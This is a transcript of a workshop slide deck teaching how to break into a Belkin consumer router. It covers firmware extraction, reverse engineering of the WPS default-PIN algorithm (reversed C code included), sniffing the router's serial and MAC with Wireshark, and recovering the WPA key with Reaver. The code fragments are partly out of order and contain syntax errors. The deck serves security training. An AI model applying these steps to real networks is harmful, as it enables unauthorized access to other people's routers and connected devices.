Embedded device hacking Session i

Embedded Device Hacking

Session I: Obtaining Initial Remote Access

By: Malachi Jones, PhD

About Me

Education

Bachelors Degree: Computer Engineering (Univ. of Florida, 2007)

Master’s Degree: Computer Engineering (Georgia Tech, 2009)

PhD: Computer Engineering (Georgia Tech, 2013)

Cyber Security Experience

Harris: Cyber Software Engineer (2013-2014)

Harris: Vulnerability Researcher (2015)

Booz Allen DarkLabs : Embedded Security Researcher (2016- Present)

https://www.linkedin.com/in/malachijonesphd

https://www.linkedin.com/in/malachijonesphd

About Dark Labs

Booz Allen Dark Labs is an elite team of security researchers,

penetration testers, reverse engineers, network

analysts, and data scientists, dedicated to stopping

cyber attacks before they occur.1

(1 http://darklabs.bah.com)

I. Motivation: Ubiquity of embedded devices

II. Objectives of Workshop

III. Workshop Overview

IV. The Workshop: Hacking a consumer router

Session I: Obtaining Initial Remote Access

Session II: Exploitation

Session III: pwnage

V. Conclusion

Outline

Motivation

Ubiquity of Embedded Devices

Critical Infrastructure (Nuclear Power Plant)

Life Critical Systems (Pace Maker)

Financial Infrastructure (Banking & Investing)

Internet of Things (IoT) (IoT Gadgets)

Commercial Products (Network Switch)

Transportation Systems (Jeep)

2015: A Year of Embedded Exploitation

(Link)

http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/

(Link)

2016: The Exploitation Continues…

https://www.washingtonpost.com/news/the-switch/wp/2016/09/20/researchers-remotely-hack-tesla-model-s/

?????

2017: Its Just Getting Started

Objectives of Workshop

Explore practical applications of reverse engineering

Discuss concepts/techniques that hackers utilize to uncover vulns in real-world embedded devices.

Provide a hands-on introduction to key pen-testing tools

Workshop Overview

Want to understand the process of hacking/ pentesting a sophisticated embedded system such as a car?

Workshop Overview

A first step is to first learn how to hack a consumer router

Why?

Its cheaper, so if you make a mistake and brick it, you won’t be out of +60k

Although a simpler system and easier target, the core pentesting principles and processes are similar

Workshop Overview

We’ll focus on a Belkin router (F5D7234-4 version 5)

Its pretty cheap (<$20) and is a pretty soft target that is suitable for individuals new to embedded hacking

Workshop Overview

Overall Hacking Objective:

Compromise an initial target (e.g wifi router) and then use that target as leverage to compromise other targets

Workshop Overview

Steps to Achieve Hacking Objective:

1) Obtain Initial remote access to the device

Wifi Router Context: This means the ability to connect to its network, which often requires knowledge of the wpa password

Workshop Overview


2) Escalate privileges on device to admin/root

Wifi Router Context: Administrative privileges can allow us to control/manipulate the IP traffic of clients connected to device

Workshop Overview


3) Exploit privileges to compromise other devices

Wifi Router Context: Send clients malicious IP traffic that allows us to compromise them also

Router Exploitation Example (via Redirection Attack)

Step 1: Hacker gains remote access to router

Step 2: Elevates privileges to admin

Step 3: Changes DNS settings on router

Step 4: Router now talks to hacker’s server to resolve name address

Step 5: www.cnn.com now resolves to an IP address of hacker’s server

Step 6: Hacker provides malicious traffic to devices on the network

Step 7:

17

Workshop Overview

Pwned

http://www.cnn.com/

Workshop Overview

The workshop will be organized into three sessions that capture the pen-testing phases of going from discovery to p0wnage Session I: Discovery of a vulnerability in the WPS

implementation to obtain initial access on device

Session II: Exploring weaknesses in the web management interface to gain administrative access

Session III: Development of a proof of concept that demonstrates how a Windows 7 user can be p0wned via web browser with a maliciously configured router








Step 7:

19

Workshop Overview

Pwned

Session I

http://www.cnn.com/








Step 7:

20

Workshop Overview

Pwned

Session II

http://www.cnn.com/








Step 7:

21

Workshop Overview

Pwned

Session III

http://www.cnn.com/

The Workshop

Hacking a Consumer Router

The Workshop

Session I:

Obtaining Initial Remote Access

to the Device

Session I: Outline

I. Overview

II. Background

III. Required Material

IV. Lab 1: Firmware Data Extraction with Binwalk

V. Lab 2: Reversing/Bug Hunting with IDA Pro

VI. Lab 3: Obtain Initial Access with Wireshark & Reaver

Session I: Overview (tldr)

WPS pin method is on by default on virtually all consumer routers

Design flaw in WPS allows pin to be brute forced in under 11000 attempts

Once a WPS pin is known, a tool such as Reaver can be utilized to retrieve the WPA key instantaneously (see next slide)

On some routers (including F5D7234-4), the default pin can be computed by reverse engineering the pin generation algorithm

Session I: The Big Picture

Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to

router and the connected clients

Reverse engineer

algorithm

Extract Firmware to find

pin algorithm

Obtain inputs to algorithm by

sniffing traffic

Generate pin and use reaver

to get password


Overall goal is to figure out what the router’s WPA password so that we can gain initial access to router

and the connected clients

Reverse engineer

algorithm


pin algorithm


sniffing traffic


to get password

Lab 1




Reverse engineer

algorithm


pin algorithm


sniffing traffic


to get password

Lab 2




Reverse engineer

algorithm


pin algorithm


sniffing traffic


to get password

Lab 3

End Result: Gain Access to Management Interface









Step 7:

31


Pwned

Session I

http://www.cnn.com/

Session I: Outline

I. Overview

II. Background





Session I: Background

1. WPS Design Flaw Explained

2. Exploiting Belkin’s PIN Generation Algorithm

3. IDA Pro

Background: WPS Explained

Wi-Fi Protected Setup (WPS) was created by Wi-Fi Alliance in 2006

Goal to make it easy for home users to add new devices securely to network w/o entering long passphrases

One of the modes allowed for user to enter the router’s 8 digit pin to connect a desired device to network


Design Flaw Explained WPS has an 8 digit pin numeric pin (0-9)

Number of attempts to bruteforce an 8 digit pin

1 2 3 4 5 6 7 8

108 = 100 million


Design Flaw Explained The 8th digit pin is a checksum

Number of attempts to bruteforce a 7 digit pin

1 2 3 4 5 6 7 8

107 = 10 million


Design Flaw Explained Pin split into two groups and a Nack/ack is sent that indicates if the pin

for that group is correct

Number of attempts to bruteforce a 7 digit pin split into groups( 4+ 3)

1 2 3 4 5 6 7 8

104 + 103= 11000

Nack/ Ack Nack/ Ack

We could exploit this design flaw for the Belkin

router that we are targeting to obtain pin

However, there is a WPS implementation flaw, specific to this router, that allows us to get the pin in 1 try vs 11,000


Background: Belkin Pin Generation Exploit

Pin generation exploit material presented in this workshop is based on the write-up by Craig @ www.devttys0.com

/DEV/TTYS0 provides excellent material on embedded hacking

in general and router hacking in particular

http://www.devttys0.com/

Background: Belkin Pin Generation Exploit

Belkin WPS Pin Algorithm

Note: Serial ID and WLAN MAC can be obtained by sniffing certain packets that are broadcast by the router

Pin Generation Algorithm

12345678

Serial ID

WLAN MAC

Background: IDA Pro

De facto tool for disassembling, decompiling, and debugging binaries

Supports a wide array of processor architectures that include the following: MIPS

ARM

X86/x64

Code Flow of Routine (sub_43A53C)

Background: IDA Pro Features

Code Flow of Routine (sub_43A53C)

For loop

Loop back Here

Branch taken to effectively exit function if de-referenced value is ‘0’


IDA Scripting support Supports python scripting, which is known as IDAPython

Provides a power way to add extensive utilities and features to python

Also has a native language, IDC, which is a “C-like” language

Decompiling with Hex-Rays (x86,x64, and ARM)


ARM Disassembly

Decompiled “Pseudo- C”


For more information on IDA, there is a pretty awesome book written by Chris Eagle


Professional Edition : $1500

Pro + Hex-rays decompiler (x86/x64 + ARM): $5500

Freeware version (link) Very old edition w/o newer features including IDAPython

only x86 disassembler support

Still a good starting point

Background: Acquiring IDA Pro

https://www.hex-rays.com/products/ida/support/download_freeware.shtml

Binary Ninja (link) License: $99.00 (Personal License)

Up and coming legitimate alternative/competitor to IDA Pro

Supports x86/x64 , ARM, and MIPS

Decompiler support

OS Platforms: Windows, OSX , and Linux

Background: IDA Pro Alternatives

http://www.hopperapp.com/

Background: IDA Pro Alternatives

Binary Ninja Screenshot

I. Overview

II. Background





Session I: Outline

Required Material

Software

Kali Linux VM 1.X

IDA Pro

Vmware/ VirtualBox

Hardware Belkin F5D7234-4 version 5

Wifi adapter w/ monitor mode

(e.g. TP-LINK TL-WN722N)

Required Material

I. Overview

II. Background


IV. Big Picture

V. Lab 1: Firmware Data Extraction

VI. Lab 2: Reversing/Bug Hunting with IDA Pro

VII. Lab 3: Obtain Initial Access with Wireshark & Reaver

Session I: Outline

Lab 1: Firmware Data Extraction & Analysis



Reverse engineer

algorithm


pin algorithm


sniffing traffic


to get password

Lab 1

Lab 1: Firmware Data Extraction & Analysis

Steps for Extraction & Analysis

1. Install squashfs-tools if not installed

2. Perform initial analysis of firmware w/ Binwalk

3. Extract firmware data

4. Explore the squash file system folder

Extraction and Analysis (Steps)

1) Install squashfs-tools if not installed

(Next Slide)

Install squashfs-tools if not installed

$ sudo apt-get install squashfs-tools


2) Let binwalk do an initial analysis of firmware

(Next Slide)

Initial analysis with Binwalk

$ sudo binwalk DIR810LB1_FW203B02.bin payload);

3) Extract firmware data

(Next Slide)


Extract Firmware Data

$ sudo binwalk –e DIR810LB1_FW203B02.bin

4) Explore files in the squash file system folder

(Next Slides)


Explore squash filesystem

ls –l /$absolute-path-to-squash-folder

Explore squash filesystem

ls –l /$absolute-path-to-squash-folder/sbin

Contains the WPS pin generation logic

Lab 1: Q&A

Why are we using Dlink firmware instead of Belkin? Dlink has symbols (e.g. function names) which makes it easier to follow for

those newer to reversing

Stripped firmware (i.e. no symbols) can be very difficult and take a substantial amount of time to reverse

Pin generation algorithm is conceptually similar between the Dlink and Belkin routers

What is a technique that can be used to help reverse engineer stripped binaries? Make use of the debug strings found in binary to build intuition about what a

routine is doing

Lab 1: Q&A

How did we know the WPS pin generation logic could be found at the following location: /sbin/ncc? Can create an IDAPython script that iterates through the binaries in the

filesystem to search for specific symbols and strings

Strings and symbols of interest could contain “WPS”, “WPS Pin”, “Pin generation” , etc….

How can the firmware be acquired? [Easy] Manufacturer’s website

[Difficult] Manual extraction from the device via JTAG or the serial port (see next 2 slide)

Note: Forge Hackerspace has a workshop on manual firmware extraction !!

Linksys WRT120N PCB (Serial Port)

Serial Port

Additional Resources Reverse Engineering Firmware: http://www.devttys0.com/2011/05/reverse-

engineering-firmware-linksys-wag120n/

Lab 1: Firmware Data Extraction

http://www.devttys0.com/2011/05/reverse-engineering-firmware-linksys-wag120n/









I. Overview

II. Background



V. Lab 2: Reversing with IDA Pro


Session I: Outline

Lab 2: Reversing with IDA Pro



Reverse engineer

algorithm


pin algorithm


sniffing traffic


to get password

Lab 2

Description In this lab, we will take a look at the binary ncc, located in /sbin of the

squash filesystem

Since ncc has quite a bit of WPS logic, which includes the pin generation algorithm, we’ll do some exploring

We’ll walk through the process of locating a code segment of interest (wps algorithm) and illustrate the process of reversing the segment into C code


Steps for Bug Hunting and Reversing

1. Load the binary ncc into IDA Pro for analysis

2. Hunt for the pin generation algorithm

3. Analyze the inputs of the algorithm

4. Reverse algorithm segment into C code


1) Load the binary ncc into IDA Pro for

analysis

(Next Slide)

Lab 2: Reversing with IDA Pro (Steps)

Load the binary ncc into IDA Pro

1a. Launch IDA Pro


1b. Click “New”


1c. Drag ncc binary into IDA

ncc binary

IDA detects that

binary is a

MIPS ELF


1d. Click “ok”


1e. Wait for IDA to finish analyzing the binary


1f. IDA indicates auto analysis has been finished

Auto analysis

complete

2) Hunt for the pin generation algorithm

(Next Slide)

Reversing with IDA Pro (Steps)

Hunt for the pin generation algorithm

1a. See if you can find the pin generation routine


a. (Hint: What happens when I search for “router” in the Function Window)

Note: Ctrl+F brings up search box Term “router” entered into the function name

filter

a. (Hint: What happens when I search for “router” in the Function Window)


Term “router” entered into the function

name filter

a. (Hint: Try some search terms relevant to the algorithm we’re trying to find)

Try your own search

terms ???


a. (Try a few more keywords before you go to the next slide!!!)

Try your own search terms

???



b. Let’s try the keyword “default” and see what we get

This looks interesting


c. Double click on “get_default_pin”


c. (Continued…)

3) Analyzing the pin algorithm in

subroutine get_default_pin

(Next Slide)

Lab 2: Reversing with IDA Pro (Steps)

Analyze pin generation algorithm

a. Lets examine possible input sources to algorithm

Analyze pin generation algorithm

a. Lets examine possible input sources to algorithm A call is made to a

sub-routine that appears to get some

information

Subset of data from lockAndGetInfo_log

will be formatted as follows: “%c:%:c%:c%….”

Any guesses on what “%c:%c…” might be?


b. Lets take a closer look at the sprintf call

Decompiling by hand to pseudo C

char buffer [….];

char * data =lockAndGetInfo_log->interesting_data_element

……………………………………

sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);

Hints

Its 12 characters with a “:” in between each pair of 2 characters

This is a networking device

What is something (e.g. identifier) that each networking devices typically has that would be a good seed for a pin generation algorithm?


c. Figure out what type of data could “%c%c…:%c%c” represent

char buffer [….];


……………………………………


Answer: MAC address Unique across all networking devices

12 bytes

Often used in combination with other values to seed various algorithms


c. Figure out what type of data could “%c%c:..:%c%c” represent

char buffer [….];


……………………………………


4) Reverse algorithm segment into C code

(Next Slide)


As we will see, reversing assembly into C can be a tedious and arduous process

We will reverse the following code segment:

Reverse algorithm segment into C code

a. Reversing an example snippet of code

Instruction ‘li’: Loads a constant value into a register


li $v0, 0x38E38E39

multu $a3, $v0

………………………………………………

mfhi $v0

srl $v0, 1


Disassembly Psuedo-C code

v0 = 0x38E38E39

MIPS Instruction ‘li’:

Loads a constant value into a register

Value will be used for future arithmetic operation



li $v0, 0x38E38E39

multu $a3, $v0

………………………………………………

mfhi $v0

srl $v0, 1



v0 = 0x38E38E39

[hi,lo] = v0*a3

MIPS Instruction ‘multiu’:

Multiply two 32-bit values (e.g. a3 & v0)

Registers `hi’ & ‘lo’ store the resulting 64-bit product

hi (upper 32-bits) lo (lower 32-bits)

64-bit product



li $v0, 0x38E38E39

multu $a3, $v0

………………………………………………

mfhi $v0

srl $v0, 1



v0 = 0x38E38E39

[hi,lo] = v0*a3

v0 = (v0*a3)>>32; right shift 32

MIPS Instruction ‘mfhi’:

Move value in ‘hi’ register to specified register (e.g. v0)

This is equivalent to right shifting the 64-bit product of v0 & a3 by 32-bits



li $v0, 0x38E38E39

multu $a3, $v0

………………………………………………

mfhi $v0

srl $v0, 1



v0 = 0x38E38E39

[hi,lo] = v0*a3

v0 = (v0*a3)>>32; right shift 32

v0 = v0 >> 1;

= ((a3 * 0x38E38E39) >>32) >> 1

MIPS Instruction ‘srl’:

Shift right logical

Logical means that the bit that replaces the most upper bits as the shift occurs is the value ‘0’

Lower bits that get shifted out are discarded

Observations

The net result of the assembly instructions is a complex looking expression

It turns out that this can be simplified quite a bit


li $v0, 0x38E38E39

multu $a3, $v0

………………………………………………

mfhi $v0

srl $v0, 1


Disassembly C code

v0 = ((a3 * 0x38E38E39) >>32) >> 1

Observations

Logical shifts have an associative property

e.g. (v1>> 32) >> 1 == v1 >> 33


li $v0, 0x38E38E39

multu $a3, $v0

………………………………………………

mfhi $v0

srl $v0, 1


Disassembly C code

v0 = ((a3 * 0x38E38E39) >>32) >> 1

= (a3 * 0x38E38E39) >> 33

Observations

Right shifting a number by 1 has the effect of dividing that number by 2.

Therefore right shifting a number by 33 has the effect of

dividing that number by 2^33 = 8589934592


li $v0, 0x38E38E39

multu $a3, $v0

………………………………………………

mfhi $v0

srl $v0, 1


Disassembly C code

v0 = ((a3 * 0x38E38E39) >>32) >> 1

= (a3 * 0x38E38E39) >> 33

= (a3 * 0x38E38E39)/8589934592

Observations

(954437177)10 = 0x38E38E39


li $v0, 0x38E38E39

multu $a3, $v0

………………………………………………

mfhi $v0

srl $v0, 1


Disassembly C code

v0 = ((a3 * 0x38E38E39) >>32) >> 1

= (a3 * 0x38E38E39) >> 33

= (a3 * 0x38E38E39)/8589934592

= (a3)(954437177/8589934592)

Observations

1/9 ~=(954437177)/8589934592


li $v0, 0x38E38E39

multu $a3, $v0

………………………………………………

mfhi $v0

srl $v0, 1


Disassembly C code

v0 = ((a3 * 0x38E38E39) >>32) >> 1

= (a3 * 0x38E38E39) >> 33

= (a3 * 0x38E38E39)/8589934592

= (a3)(954437177/8589934592)

= (a3)(1/9)

Observations As the above example illustrates, the disassembly performs operations such

as shifts to do multiplication and division

What looks complex may be able to be decompiled into something much simpler


li $v0, 0x38E38E39

multu $a3, $v0

………………………………………………

mfhi $v0

srl $v0, 1


v0 = ($a3)/9

Disassembly C code

Luckily someone else (Craig) did all the grunt work in decompiling the disassembly for us

But we’ve seen how the general process for reversing works, so in theory we could do it

On the next slides, we’ll show the complete C implementation of the get_default_pin algoritm


b. Reversing the entire algorithm

dd

/* * The largest possible remainder for any value divided by 10,000,000 * is 9,999,999 (7 digits). The smallest possible remainder is, * obviously, 0. */

pin = pin % 10000000; /* The pin needs to be at least 7 digits long */ if(pin < 1000000) { /* * The largest possible remainder for any value divided by 9 is * 8; hence this adds at most 9,000,000 to the pin value, and at * least 1,000,000. This guarantees that the pin will be 7 digits * long, and also means that it won't start with a 0. */

pin += ((pin % 9) * 1000000) + 1000000; } /* * The final 8 digit pin is the 7 digit value just computed, plus a * checksum digit. Note that in the disassembly, the wps_pin_checksum * function is inlined (it's just the standard WPS checksum implementation). */

pin = ((pin * 10) + wps_pin_checksum(pin)); sprintf(buf, "%08d", pin); return pin; }

get_default_pin (Dlink router)

unsigned int generate_default_pin(char *buf) { char *mac; char mac_address[32] = { 0 }; unsigned int oui, nic, pin;

/* Get a pointer to the WAN MAC address */ mac = lockAndGetInfo_log()->wan_mac_address;

/* * Create a local, NULL-terminated copy of the WAN MAC (simplified from * the original code's sprintf/memmove loop). */ sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0], mac[1], mac[2], …… mac[11] sscanf(mac_address, "%06X%06X", &oui, &nic); /* Do some XOR munging of the NIC. */ pin = (nic ^ 0x55AA55); pin = pin ^ (((pin & 0x0F) << 4) + ((pin & 0x0F) << 8) + ((pin & 0x0F) << 12) + ((pin & 0x0F) << 16) + ((pin & 0x0F) << 20));

We could follow a similar process to reverse the Belkin Pin algorithm

Yet again, Craig has spared us the trouble

On the next slide is the reversed C implementation of the Belkin algorithm


c. Reversing the Belkin Pin Generation Algorithm

k1 = (sn[SN_DIGIT_2] + sn[SN_DIGIT_3] + nic[NIC_NIBBLE_0] + nic[NIC_NIBBLE_1]) % 16; k2 = (sn[SN_DIGIT_0] + sn[SN_DIGIT_1] + nic[NIC_NIBBLE_3] + nic[NIC_NIBBLE_2]) % 16; pin = k1 ^ sn[SN_DIGIT_1]; t1 = k1 ^ sn[SN_DIGIT_0]; t2 = k2 ^ nic[NIC_NIBBLE_1]; p1 = nic[NIC_NIBBLE_0] ^ sn[SN_DIGIT_1] ^ t1; p2 = k2 ^ nic[NIC_NIBBLE_0] ^ t2; p3 = k1 ^ sn[SN_DIGIT_2] ^ k2 ^ nic[NIC_NIBBLE_2]; k1 = k1 ^ k2; pin = (pin ^ k1) * 16; pin = (pin + t1) * 16; pin = (pin + p1) * 16; pin = (pin + t2) * 16; pin = (pin + p2) * 16; pin = (pin + k1) * 16; pin += p3; pin = (pin % 10000000) - (((pin % 10000000) / 10000000) * k1) return (pin * 10) + wps_checksum(pin); }

get_default_pin (Belkin router) /* Munges the MAC and serial numbers to create a WPS pin */ int pingen(char *mac, char *serial) { #define NIC_NIBBLE_0 0 #define NIC_NIBBLE_1 1 #define NIC_NIBBLE_2 2 #define NIC_NIBBLE_3 3 #define SN_DIGIT_0 0 #define SN_DIGIT_1 1 #define SN_DIGIT_2 2 #define SN_DIGIT_3 3 int sn[4], nic[4], mac_len, serial_len; int k1, k2, pin p1, p2, p3 t1, t2; mac_len = strlen(mac); serial_len = strlen(serial); /* Get the four least significant digits of the serial number */ sn[SN_DIGIT_0] = char2int(serial[serial_len-1]); sn[SN_DIGIT_1] = char2int(serial[serial_len-2]); sn[SN_DIGIT_2] = char2int(serial[serial_len-3]); sn[SN_DIGIT_3] = char2int(serial[serial_len-4]); /* Get the four least significant nibbles of the MAC address */ nic[NIC_NIBBLE_0] = char2int(mac[mac_len-1]); nic[NIC_NIBBLE_1] = char2int(mac[mac_len-2]); nic[NIC_NIBBLE_2] = char2int(mac[mac_len-3]); nic[NIC_NIBBLE_3] = char2int(mac[mac_len-4]);

Lab 2: Q&A

Why are weaknesses in implementation of a security design not discovered before product released? Companies care more about time-to-market

Subscribe to the notion of security through obscurity

How long does the reverse engineering process take? Depends on the device and the skills of the personnel

Charlie and Chris (Chrysler Jeep hack) said it took them over 3.5 months and they are pretty experienced

Lab 2: Q&A

Is the reverse process always this tedious? In general…yes, if not more so.

What things can make reversing harder? Stripped binaries (e.g. no symbols)

Anti-debugging techniques

Code obfuscation

Writing original code in C++

What is an ELF (Executable and Linkable Format)? Standard file format on Unix-like systems

Lab 2: Q&A

Why is MIPS still popular in embedded devices? Licensing costs for MIPS is cheaper than ARM

Why couldn’t we decompile using IDA Pro? IDA only supports ARM and x86/64

No reliable decompilers for MIPS in general.

Additional Resources Reversing D-Link’s WPS Pin Algorithm:

http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/













I. Overview

II. Background



V. Lab 2: Reversing with IDA Pro

VI. Lab 3: Obtain Initial Access with Wireshark

& Reaver

Session I: Outline

Lab 3: Obtaining initial access



Reverse engineer

algorithm


pin algorithm


sniffing traffic


to get password

Lab 3

Description In this lab, we will explore how to use our knowledge of the pin generation

algorithm to derive the WPA Key

Specifically, we will first need to acquire relevant input information into the algorithm by using Wireshark, and then run the algorithm to compute the WPS PIN

Then we’ll need to use Reaver to derive the WPA key from the WPS PIN


Steps for Obtaining initial access

1. Acquire serial and wlan mac w/ Wireshark

2. Compile & execute wps pin generation algorithm

3. Run Reaver to obtain the WPA key

4. Connect to the router utilizing obtained WPA key


1) Acquire Serial and WLAN MAC with

Wireshark

(Next Slides)


We’ll need a wifi adapter that supports monitor mode

Monitor mode enables monitoring of all traffic received

Normally, the wifi adapter will filter out traffic not destined for it

An example wifi adapter that supports monitor mode is the TP-LINK TL-WN722N

(pictured above); cost about $12

Acquiring serial and wlan information

a. Attach Wifi adapter (monitor mode support) to PC

b. Connect wifi adapter to guest Kali-Linux VM


Click this

b. Connect wifi adapter to guest Kali-Linux VM


Click This

c. Get the name of the wireless interface (e.g. wlanx),were x is 0-9


$ sudo iwconfig

Wireless Interface Name

d. Bring the wireless interface down so we can configure it


$ sudo ifconfig wlanx down

e. Change the wifi mode to monitor


$ sudo iwconfig wlan0 mode monitor

f. Set the channel of wireless interface to channel y, where y in 1-12


$ sudo iwconfig wlan0 channel %y%

g. Bring the wireless interface back up


$ sudo ifconfig wlan0 up

h. Launch Wireshark


$ sudo wireshark

h. Click on wireless interface wlanx


Click this

i. Click Start


Click this

i. Click Start


i. (Continued)


j. Wait approximately 1-3 minute(s) as Wireshark captures packets


k. Stop the capture


Click to stop Capture

l. Find a probe response message from Belkin_xx:xx:xx and click on it


m. Click on “IEEE 802.11 wireless LAN management” to expand the selection


Click to expand

n. (After click)


o. Click on “Tagged parameters” to expand the selection


After Click

p. Click on “Vendor Specific” to expand the selection


After Click

q. Locate and record the Serial Number


Serial Number

r. Locate and Record wlan MAC address of the Belkin router


MAC Address

2. Compile & execute wps pin

generation algorithm

(Next Slides)


a. Download pingen algorithm source from here and save to home dir

Compile & Execute WPS pingen Algorithm

https://github.com/devttys0/wps/blob/master/pingens/belkin/pingen.c

b. Compile pingen.c


$ sudo gcc -Wall pingen.c -o pingen

c. Executing the pingen binary to see usage


$ ./pingen

d. Pass in appropriate parameters and execute pingen to get pin


$ ./pingen xxxx xxxx

Default Pin

e. The Results


The Pin

Default Pin

e. The Results


The Pin

3. Run Reaver to obtain WPA Key

(Next Slides)


a. Executing Reaver with appropriate arguments

Run Reaver to Obtain WPA Key

reaver -i (monitor interface) -b (BSSID) -c (channel) ---pin=(8 digit pin) –T 5 -vv

b. Wait for the Results (can take up to 30 seconds)

Run Reaver to Obtain WPA Key

WPA KEY

4. Connect to the router by utilizing

the obtained WPA key

(Next Slides)


a. Bring the wireless interface down so we can configure it

Connect to router with WPA key

$ sudo ifconfig wlanx down

b. Change the wifi mode to managed


$ sudo iwconfig wlan0 mode managed

c. Bring the wireless interface back up


$ sudo ifconfig wlan0 up

c. Wait about a minute or so for the interface to be brought up


d. Click the networking icon


Click this icon

e. Select the Appropriate Access Point


Click on the appropriate AP

f. Enter the WPA key and connect


Enter WPA Key

g. Wait while connection occurs


Connecting…

h. Connection is established


Success!!

h. Connect to web management server (Obtained Initial Access!!)


i. Log into web management interface (Preview of next session)


We’ll figure out how to gain admin access in Session II

Lab 3: Q&A

What’s the difference between monitor mode and promiscuous mode? Promiscuous mode allows packets to be sniffed only on the AP the wifi

adapter is currently connected to

Monitor mode allows all packets on a particular channel to be sniffed if packets are in listening range

Are there any other interesting wifi modes? Master mode, which allows the wifi adapter to behave as an access point

The TP Link adapter also supports this mode

References

[1] WPS Vulnerability, University of Alabama, Huntsville

http://pervasive.cs.uah.edu/PSP/sites/default/files/WPSVulnerability.pdf

Recap

Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to


Reverse engineer

algorithm


pin algorithm


sniffing traffic


to get password

Recap



Reverse engineer

algorithm


pin algorithm


sniffing traffic


to get password

Lab 1

Recap



Reverse engineer

algorithm


pin algorithm


sniffing traffic


to get password

Lab 2

Recap



Reverse engineer

algorithm


pin algorithm


sniffing traffic


to get password

Lab 3








Step 7:

174

Recap

Pwned

Session I

http://www.cnn.com/

Conclusion

In this session, we were able to obtain initial remote access to the target device

The next step is to elevate our privileges on the target to that of an adminsitrator.

This device uses client side authentication for admin privileges, which we will exploit in Session II

Session III will be focused on utilizing admin privileges from Session II to compromise a Windows 7 device connected to the Belkin router

Embedded device hacking Session i

Technology

Transcript of Embedded device hacking Session i